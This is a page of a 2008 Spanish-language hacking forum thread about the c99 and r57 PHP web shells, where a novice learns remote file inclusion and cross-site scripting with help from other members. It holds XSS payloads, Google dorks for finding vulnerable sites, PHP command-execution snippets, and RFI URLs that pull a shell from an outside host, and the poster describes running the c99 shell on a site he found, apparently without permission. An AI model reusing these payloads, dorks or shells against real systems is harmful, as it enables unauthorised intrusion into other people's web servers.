elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  c99.txt y r57.txt
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] Ir Abajo Respuesta Imprimir
Autor Tema: c99.txt y r57.txt  (Leído 17,016 veces)
achernar_

Desconectado Desconectado

Mensajes: 117



Ver Perfil
Re: c99.txt y r57.txt
« Respuesta #10 en: 31 Mayo 2008, 16:50 pm »

El script funciono bien, ahora las diferencias entre

><script>alert();</script>

y

<script>alert()</script> son porque hay que cerrar la llave abierta con el <frame src??? de modo que quedaria algo asi:

<frame src=><script>alert();</script><noframes>
no entiendo bien lo del ";" pero creo que voy bien, entonces si la pagina fuese verdaderamente vulnerable no tendria que mostrarme a google via frame src y entonces quizas el script para XSS no tendria que funcionar? estoy en lo correcto?
En línea

Tengo una habilidad sorprendente para hacer cosas que no sorprenden.
sirdarckcat
Aspirante a supervillano
Moderador
***
Desconectado Desconectado

Mensajes: 7.029


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
Re: c99.txt y r57.txt
« Respuesta #11 en: 1 Junio 2008, 00:20 am »

el ; es porque es javascript, y javascript usa sintaxis de C, que te pide un ; despues de cada instruccion, aunque podrias no ponersela y no pasa nada..

y si, si le mandas google como argumento te deberia mostrar google..

Saludos!!
En línea

achernar_

Desconectado Desconectado

Mensajes: 117



Ver Perfil
Re: c99.txt y r57.txt
« Respuesta #12 en: 3 Junio 2008, 21:23 pm »

en google estoy usando cosas como estas:

filetype:php inurl:url inurl:htm

pero no encuentro ninguno vulnerable para ver como es, siempre pasa lo mismo, creo que es lo de <iframe src=...

creo que en el codigo fuente tendria que haber un get? pude ser? hay alguna forma de buscar en google algo en el codigo fuente?
En línea

Tengo una habilidad sorprendente para hacer cosas que no sorprenden.
Azielito
no es
Colaborador
***
Desconectado Desconectado

Mensajes: 9.188


>.<


Ver Perfil WWW
Re: c99.txt y r57.txt
« Respuesta #13 en: 3 Junio 2008, 23:58 pm »

deberia ser
Código:
archivo.php=
url.php=
file.php=

cosas similares
En línea

achernar_

Desconectado Desconectado

Mensajes: 117



Ver Perfil
Re: c99.txt y r57.txt
« Respuesta #14 en: 4 Junio 2008, 21:03 pm »

bueno, segui con mi busqueda filetype:php inurl:page inurl:htm y despues miraba el codigo fuente buscando cosas como las que dijo Azielito y al final creo que encontre una web vulnerable, pero comparado con la shell que se ve aca

http://www.youtube.com/watch?v=Zrp-HeeU4ME

la que ejecute es parecida (http://www.deyvill.org/c99.txt) con algunas cajas de texto pero con un gran desparramo de texto alrededor que parece codigo fuente... ¿que es eso? codigo que no se pudo ejecutar en el servidor? quise meter un simple ls y me salto una pagina de error y despues intente con un dir y paso lo mismo... alguien me puede explicar que es lo que vi? puede que estor errores al meter los comandos sean por el mismo motivo que hay codigo desparramado por toda la interfaz?

suponiendo que tengo php?page=http://www.deyvill.org/c99.txt

como tendria que hacer para ejecutar un comando desde la barra de direcciones, o sea, sin usar la shell? supongo que sera posible no?

--------------------- Minutos despues ------------------------

encontre esto la sección de textos de elhacker.net

Citar
Nota: solo van a correr estos comandos los servidores tengan el safe mode
en off.

Entonces codeamos algo así:

<?php
$cmd=$_GET['cmd'];
show_source($cmd);
?>

Y lo subimos a nuestro Server, este seria explotado de esta manera:

http://victima.com/pagvuln.php?page=http//[tusitio]/file-a-incluir

Estas funciones permiten correr comandos en el sistema. Ya sabiendo
usarlas podemos ponerle una extensión .gif y subirlas a nuestro webserver
para incluirlas en la victima desde ahí. Se las renombra a .gif, ya que si las
dejáramos en php se ejecutarían en nuestro server.

Ejecutores de comandos
Los ejecutores de comandos o "shells en php" son líneas de código que permiten
ejecutar comandos más fácil, se usan así:

http://victima.com/pagvuln.php?page=http//[tusitio]/shell.php?cmd=ls

este ultimo renglon me genera una confusion, y es que dice shell.php?cmd=ls , no tendira que decir shell.gif?cmd=ls o cualquier otra extension que no sea php?

yo subi un archivo php y uno gif a un servidor para ver esto y cuando uso el php me dice que el safe mode esta activado y me da unos path del servidor donde estan los archivos que yo subi (entonces creo que se ejecuta en mi servidor) y cuando uso el gif no me muestra nada, supongo que el servidor vulnerable no es tan vulnerable y tiene tambien el safe mode acrivado ¿puede ser este el motivo por el que la shell c99 no se ve bien?
« Última modificación: 4 Junio 2008, 22:07 pm por achernar_ » En línea

Tengo una habilidad sorprendente para hacer cosas que no sorprenden.
alienmaster

Desconectado Desconectado

Mensajes: 41


SK8ORDIE


Ver Perfil WWW
Re: c99.txt y r57.txt
« Respuesta #15 en: 6 Junio 2008, 15:02 pm »

La r57 esta bien, pero la c99 no la supera ninguna, ahi ves todas las tolls que incluye de ftp brute, un mini phpmyadmin, etc...

Saludos
En línea

achernar_

Desconectado Desconectado

Mensajes: 117



Ver Perfil
Re: c99.txt y r57.txt
« Respuesta #16 en: 8 Junio 2008, 06:28 am »

al final creo que debe ser eso de tener el safe mode on en el servidor, porque en algunos lados donde podia redireccionar a google sin usar frames o iframes y las shell se ejecutaban por la mitad no podia ejecutar algo tan sencillo como esto:

<?php
  system($cmd)
?>

lo escribi de memoria, no se si era exactamente asi, pero tenia que poner algo como index.php?page=http://www.misitio.com/shell.txt?cmd=pwd? y no pasaba nada con y sin el ? al final. asi que creo que por eso no consigo hacer funcionar las shells.. ya me parece un poco dificil encontrar donde ejecutarlas
 :P :P

encontre esto:

La función system esta deshabilitada por el modo seguro de php, motivos de seguridad

y otra cosa es que en paginas hechas en iespana para pasar los parametros por la url teneia que usar $HTTP_GET_VARS["variable"] o sino no me tomaba su contenido.

creo que en este tiempito aprendí bastante, gracias a todos por dar una mano.  :-*  :xD :xD :xD que gay  :xD :xD
« Última modificación: 8 Junio 2008, 07:55 am por achernar_ » En línea

Tengo una habilidad sorprendente para hacer cosas que no sorprenden.
Páginas: 1 [2] Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines